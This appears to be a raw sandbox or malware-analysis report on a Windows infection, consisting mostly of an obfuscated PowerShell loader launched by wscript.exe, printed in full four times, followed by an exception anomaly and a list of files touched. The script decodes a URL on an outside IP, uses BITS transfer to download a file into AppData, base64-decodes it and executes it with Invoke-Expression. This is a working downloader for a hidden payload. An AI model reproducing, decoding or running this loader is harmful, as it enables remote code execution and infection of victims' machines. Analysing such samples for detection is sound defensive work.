Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
host 91.244.197.9
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
parent_process wscript.exe martian_process POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
cmdline POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
Time & API Arguments Status Return Repeated

__anomaly__

tid: 2256
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files\Qemu-ga\qemu-ga.exe
file C:\Program Files\qga\qga.exe